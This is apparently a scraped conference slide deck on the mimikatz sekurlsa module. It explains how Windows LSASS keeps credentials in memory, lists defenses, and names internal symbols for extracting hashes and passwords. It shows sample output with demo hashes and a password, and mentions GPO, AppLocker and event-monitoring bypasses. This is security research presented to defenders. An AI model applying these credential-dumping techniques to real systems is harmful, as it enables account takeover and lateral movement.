mimikatz :: sekurlsa why this is dangerous ? Not a bug Not a weakness Not a vulnerability Not a 0-day (for now, there may be too) It’s “normal” that LSASS keeps passwords in memory for passwords based providers when protocols need them And hashes for msv1_0… All of these rely on shared secrets… So you can’t prevent Windows internal behaviors… (in a supported way) One change from Microsoft on protocols can impact all versions I don’t count on a fix or others things in the next [5;10] years… 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa what we can do ? Basics No physical access to computer (first step to pass the hash) No admin rights / system rights / debug privileges (…) Disable local admin accounts Strong passwords (haha, it was a joke) Network login instead of interactive (when possible) Audit ; pass the hash keeps traces and can lock accounts No admin rights / system rights / debug privileges, even VIP More in depth Force strong authentication (SmartCard & Token) : $ / € Short validity for Kerberos tickets No delegation Disable NTLM (available with NT6) No exotic : biometrics (it keeps password somewhere and push it to Windows) single sign on Stop shared secrets for authentication : push Public / Private stuff (like keys ;)) Let opportunities to stop retrocompatibility Disable faulty providers ? Is it supported by Microsoft ? Even if, you will disable Kerberos and msv1_0 ? 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa Code it ! Implement it in Meta ! Discover ! Pass the hash : Get passwords : Package Symbols Description msv1_0 SeckPkgFunctionTable->GetCredentials SeckPkgFunctionTable->LsaUnprotectMemory Get clear LM & NTLM hashes from LUID SeckPkgFunctionTable->LsaProtectMemory SeckPkgFunctionTable->AddCredential Push clear LM & NTLM hashes to LUID SeckPkgFunctionTable->DeleteCredential Delete hashes from LUID Package Symbols Type tspkg tspkg!TSGlobalCredTable SeckPkgFunctionTable->LsaUnprotectMemory RTL_AVL_TABLE wdigest wdigest!l_LogSessList LIST_ENTRY livessp livessp!LiveGlobalLogonSessionList kerberos (nt5) kerberos!KerbLogonSessionList kerberos (nt6) Kerberos!KerbGlobalLogonSessionTable 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa little help to start ! Package Datas Little help * @getLogonPasswords Use « full » keyword in argument of functions msv1_0 @getMSV msv1_0 : * Utilisateur : termuser * Domaine : DEMO * Hash LM : d0e9aee149655a6075e4540af1f22d3b * Hash NTLM : cc36cf7a8514893efccd332446158b1a @getMSVFunctions ** lsasrv.dll ** ; Statut recherche : OK :) – 3 @GetCredentials = 000007F9C1C62938 @AddCredential = 000007F9C1C71010 @DeleteCredential = 000007F9C1C61F58 @LsaUnprotectMemory = 000007F9C1C59960 @LsaProtectMemory = 000007F9C1C628A4 tspkg @getTsPkg tspkg : * Mot de passe : waza1234/ @getTsPkgFunctions ** tspkg.dll/lsasrv.dll ** ; Statut recherche : OK :) @TSGlobalCredTable = 000007F9C1557B20 wdigest @getWDigest wdigest : @getWDigestFunctions ** wdigest.dll/lsasrv.dll ** ; Statut recherche : OK :) @l_LogSessList = 000007F9C15E12B0 livessp @getLiveSSP livessp : * Utilisateur : sekurlsa@live.fr * Domaine : ps:password @getLiveSSPFunctions ** livessp.dll/lsasrv.dll ** ; Statut recherche : OK :) @LiveGlobalLogonSessionList = 000007F9C14E8C68 @LsaUnprotectMemory = 000007F9C1C59960 kerberos @getKerberos kerberos : * Domaine : DEMO.LOCAL @getKerberosFunctions ** kerberos.dll/lsasrv.dll ** ; Statut recherche : OK :) @KerbGlobalLogonSessionTable = 000007F9C1955AE0 @KerbLogonSessionList = 0000000000000000 @LsaUnprotectMemory = 000007F9C1C59960 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa some ideas Meterpreter post module Standalone binary without injection yeah, it’s easy ! read all data (sessions, encrypted passwords) read all keys and implement your own (un)protectMemory routine ! decrypt / crypt Extract all of this from memory dump / hyberfile ! etc… Make demonstrations to your chief information security officer Ask Microsoft to work on better implementation Maybe offer possibilities to disable or not some functionalities Think globally about data really needed for authentication 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa some ideas Meterpreter post module Standalone binary without injection yeah, it’s easy ! read all data (sessions, encrypted passwords) read all keys and implement your own (un)protectMemory routine ! decrypt / crypt Extract all of this from memory dump / hyberfile ! etc… Make demonstrations to your chief information security officer Ask Microsoft to work on better implementation Maybe offer possibilities to disable or not some functionalities Think globally about data really needed for authentication 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz what else ? Crypto Stop event monitoring Basic GPO bypass Export non-exportable certificates and keys CryptoAPI CNG… Stop event monitoring Basic GPO bypass Applocker / SRP bypass Driver Play with tokens & privileges Display SSDT x86 & x64 List minifilters actions List Notifications (process / thread / image / registry) List Objects hooks and procedures … mod_mimikatz_crypto mod_crypto mod_mimikatz_divers mod_mimikatz_nogpo kappfree.dll mimikatz.sys 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz that’s all folks ! Thanks’ to / Спасибо : my girlfriend for her support (her LSASS crashed few times) Positive Technologies to offer me this great opportunity Microsoft to consider it as normal/acceptable  Security friends/community for their ideas & challenges You, for your attention ! Questions ? Don’t be shy ;) especially if you have written the corresponding slide number 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz source code Not now available I’m not proud of mixing C/C++ and STL in LSASS Script kiddies will use it without understanding But a little part of it for “pass the pass” available So download it on mimikatz download page  http://blog.gentilkiwi.com/mimikatz 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

Blog & Contact blog/mimikatz : http://blog.gentilkiwi.com/mimikatz email : benjamin@gentilkiwi.com Twitter : @gentilkiwi 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.